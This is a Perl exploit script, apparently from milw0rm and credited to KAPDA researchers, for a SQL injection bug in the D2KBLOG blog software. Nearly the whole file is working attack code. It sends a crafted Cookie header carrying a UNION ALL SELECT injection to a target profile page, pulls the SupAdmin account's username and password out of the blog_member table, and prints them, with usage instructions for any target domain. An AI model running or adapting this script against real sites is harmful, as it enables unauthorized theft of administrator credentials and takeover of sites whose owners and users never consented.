 #!/usr/bin/perl -w 
 # D2KBLOG SQL injection 
 # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
 # Exploited by : devil_box [ devil_box [at} kapda.ir ]
 # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "	KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print "	PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print "	Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

 if (@ARGV != 2) 
 { 
    print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; 
    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
    exit (); 
 } 


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

$r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );

$res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

	print "|***| Extracting Username and Password ...\r\n\r\n";

	my $results = $res->content; 

	while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }

	print "\r\n	Exploit by Devil_Box\r\n		Discovery by Farhad koosha\r\n\r\n";

 } else {
	die "\r\n|***| ".$res->status_line;
 }

# milw0rm.com [2006-03-09]
